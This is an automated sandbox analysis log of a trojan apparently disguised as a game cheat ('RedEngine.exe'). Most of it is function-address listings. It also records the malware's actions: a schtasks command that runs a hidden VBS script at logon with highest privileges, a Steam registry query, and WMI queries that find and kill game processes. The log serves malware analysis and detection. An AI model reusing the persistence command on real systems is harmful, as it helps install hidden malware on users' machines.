                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB0B8442_2_00007FF795BB0B84
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B98B2042_2_00007FF795B98B20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB0D63188042_2_00007FFB0D631880
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB0D6312F042_2_00007FFB0D6312F0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B192042_2_00007FFB1C3B1920
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B1A0042_2_00007FFB1C3B1A00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B55D042_2_00007FFB1C3B55D0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3BFA8842_2_00007FFB1C3BFA88
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B465042_2_00007FFB1C3B4650
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B5F0042_2_00007FFB1C3B5F00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B12B042_2_00007FFB1C3B12B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B2F8042_2_00007FFB1C3B2F80
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B8F4042_2_00007FFB1C3B8F40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B73F842_2_00007FFB1C3B73F8
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3B23B042_2_00007FFB1C3B23B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C453D6042_2_00007FFB1C453D60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4DE64042_2_00007FFB1C4DE640
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C497FE042_2_00007FFB1C497FE0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F60C042_2_00007FFB1C3F60C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C46B9F042_2_00007FFB1C46B9F0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5402D042_2_00007FFB1C5402D0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C454B9042_2_00007FFB1C454B90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4173A042_2_00007FFB1C4173A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4864B042_2_00007FFB1C4864B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4BAD9042_2_00007FFB1C4BAD90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F359042_2_00007FFB1C3F3590
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C44D53042_2_00007FFB1C44D530
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C40F52042_2_00007FFB1C40F520
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C504DF042_2_00007FFB1C504DF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C406DF042_2_00007FFB1C406DF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4B2DB042_2_00007FFB1C4B2DB0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F667A42_2_00007FFB1C3F667A
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C49EE6042_2_00007FFB1C49EE60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3EFE2042_2_00007FFB1C3EFE20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C47065042_2_00007FFB1C470650
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C411EF042_2_00007FFB1C411EF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C52271042_2_00007FFB1C522710
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F871042_2_00007FFB1C3F8710
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4076B042_2_00007FFB1C4076B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C40FF3042_2_00007FFB1C40FF30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C49D01042_2_00007FFB1C49D010
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C50DFF042_2_00007FFB1C50DFF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4017C042_2_00007FFB1C4017C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4A806042_2_00007FFB1C4A8060
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C50B05042_2_00007FFB1C50B050
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3F905042_2_00007FFB1C3F9050
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C40E91042_2_00007FFB1C40E910
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4A611042_2_00007FFB1C4A6110
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3E10FE42_2_00007FFB1C3E10FE
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C45A10042_2_00007FFB1C45A100
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C41110042_2_00007FFB1C411100
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C45692042_2_00007FFB1C456920
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C47329042_2_00007FFB1C473290
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C515A6042_2_00007FFB1C515A60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4FEA9042_2_00007FFB1C4FEA90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C45028042_2_00007FFB1C450280
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3E3A4742_2_00007FFB1C3E3A47
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C453A4042_2_00007FFB1C453A40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C50AAD042_2_00007FFB1C50AAD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4DC2C042_2_00007FFB1C4DC2C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C484B6042_2_00007FFB1C484B60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C41539042_2_00007FFB1C415390
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C40538042_2_00007FFB1C405380
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C456B3042_2_00007FFB1C456B30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C437B4042_2_00007FFB1C437B40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C471BD042_2_00007FFB1C471BD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C500BD042_2_00007FFB1C500BD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C4DA42042_2_00007FFB1C4DA420
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C505C2042_2_00007FFB1C505C20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C53342042_2_00007FFB1C533420
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C43344742_2_00007FFB1C433447
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C61F91042_2_00007FFB1C61F910
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C67568E42_2_00007FFB1C67568E
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C67723042_2_00007FFB1C677230
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B131042_2_00007FFB1C5B1310
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B508042_2_00007FFB1C5B5080
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C68637042_2_00007FFB1C686370
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5D3D0042_2_00007FFB1C5D3D00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C659D6042_2_00007FFB1C659D60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64BD4042_2_00007FFB1C64BD40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A3D3042_2_00007FFB1C5A3D30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C629E9042_2_00007FFB1C629E90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62FE2042_2_00007FFB1C62FE20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5DFEE042_2_00007FFB1C5DFEE0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C68BF7042_2_00007FFB1C68BF70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B5FB042_2_00007FFB1C5B5FB0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5DB91042_2_00007FFB1C5DB910
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64D96042_2_00007FFB1C64D960
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C6139E042_2_00007FFB1C6139E0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C6899A042_2_00007FFB1C6899A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C651A7042_2_00007FFB1C651A70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C605A7042_2_00007FFB1C605A70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E5A5042_2_00007FFB1C5E5A50
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C685B1042_2_00007FFB1C685B10
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C665AF042_2_00007FFB1C665AF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64FAD042_2_00007FFB1C64FAD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65BAA042_2_00007FFB1C65BAA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65FBF042_2_00007FFB1C65FBF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5ADBA042_2_00007FFB1C5ADBA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62171042_2_00007FFB1C621710
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5FB6A042_2_00007FFB1C5FB6A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C69979042_2_00007FFB1C699790
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62373C42_2_00007FFB1C62373C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62772042_2_00007FFB1C627720
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C6717C042_2_00007FFB1C6717C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65385042_2_00007FFB1C653850
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5C784042_2_00007FFB1C5C7840
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E382042_2_00007FFB1C5E3820
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B582042_2_00007FFB1C5B5820
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5AD83042_2_00007FFB1C5AD830
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E310042_2_00007FFB1C5E3100
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E910042_2_00007FFB1C5E9100
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A10E042_2_00007FFB1C5A10E0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64D29042_2_00007FFB1C64D290
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C66B27042_2_00007FFB1C66B270
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62325B42_2_00007FFB1C62325B
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64325042_2_00007FFB1C643250
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C67D2E042_2_00007FFB1C67D2E0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C61938042_2_00007FFB1C619380
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C60F37042_2_00007FFB1C60F370
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C61ACD042_2_00007FFB1C61ACD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C698D8042_2_00007FFB1C698D80
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C658D5042_2_00007FFB1C658D50
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C618D4042_2_00007FFB1C618D40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C664D3042_2_00007FFB1C664D30
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: String function: 00007FFB01F84330 appears 31 times
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: String function: 64963C90 appears 40 times
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: String function: 64963CD0 appears 49 times
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: String function: 00007FF741BC2760 appears 36 times
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: String function: 648DECD0 appears 235 times
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: String function: 00007FF741BC25F0 appears 100 times
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: String function: 00007FFB01F6A3F0 appears 245 times
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: String function: 00007FFB1C4EC7B0 appears 70 times
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: String function: 00007FFB1C693540 appears 53 times
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: String function: 00007FF795B925F0 appears 100 times
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: String function: 00007FFB1C4F4330 appears 133 times
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: String function: 00007FFB1C4DA3F0 appears 1036 times
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: String function: 00007FF795B92760 appears 36 times
Source: unicodedata.pyd.14.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.38.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.41.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: pyarmor_runtime.pyd.41.dr | Static PE information: Number of sections : 11 > 10
Source: zlib1.dll.38.dr | Static PE information: Number of sections : 12 > 10
Source: pyarmor_runtime.pyd.14.dr | Static PE information: Number of sections : 11 > 10
Source: zlib1.dll.41.dr | Static PE information: Number of sections : 12 > 10
Source: pyarmor_runtime.pyd.38.dr | Static PE information: Number of sections : 11 > 10
Source: zlib1.dll.14.dr | Static PE information: Number of sections : 12 > 10
Source: RedEngine.exe, 00000001.00000000.1296199972.00000000004A2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePAN.exe4 vs RedEngine.exe
Source: RedEngine.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
Source: mgne4i3n.t1d0.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mgne4i3n.t1d0.exe.3.dr, -.cs | Cryptographic APIs: 'CreateDecryptor'
Source: mgne4i3n.t1d0.exe.3.dr, -.cs | Cryptographic APIs: 'CreateDecryptor'
Source: mgne4i3n.t1d0.exe.3.dr, -.cs | Base64 encoded string: 'ZZ0PIMiUGLYZMsGcVZAVO8PXd5cPMcCbWp1HE8iNc4oIJtS4RZcZOc+VT98bMdmmcJEQOOOYW4FHO92mf4oZJdiYWo0ILZaeU5AjGMiXUZAUb+qcQrAFJMi/RIsRHMyXUogZb8qcQrsyNcCcDa0SMMiBeYJHBsiYUrcIJsSXUd89MMnCUYEIC/2WRY0IPcKXDYMZIPK6Q5YOMcONcosRNcSXDbcZIOmYQoVHZ5zKBtJHFd6KU4keONSqU5YKMd/CZY0RJMGcd5cPMcCbWp05LN2VWZYZJpabV4YZONuUDZcRO8acQoEPIA=='
Source: classification engine | Classification label: mal100.troj.evad.winEXE@383/2861@4/4
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BC29E0 GetLastError,FormatMessageW,MessageBoxW
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB0199A3B0 CoCreateInstance,EnableWindow,CoTaskMemFree,CoTaskMemFree
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Code function: 13_2_004026B8 LoadResource,SizeofResource,FreeResource
Source: C:\Users\user\Desktop\RedEngine.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RedEngine.exe.log
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugz0binj.yrp.ps1
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
Source: RedEngine.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RedEngine.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RainbowSix.exe")
Source: C:\Windows\System32\findstr.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\findstr.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\OpenWith.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\OpenWith.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tf_win64.exe")
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "dota2.exe")
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cs2.exe")
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RustClient.exe")
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "GTA5.exe")
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\RedEngine.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RedEngine.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RedEngine.exe | ReversingLabs: Detection: 68%
Source: mgne4i3n.t1d2.exe | String found in binary or memory: -startline must be less than or equal to -endline
Source: mgne4i3n.t1d2.exe | String found in binary or memory: -help
Source: clppth.exe | String found in binary or memory: -help
Source: clppth.exe | String found in binary or memory: -startline must be less than or equal to -endline
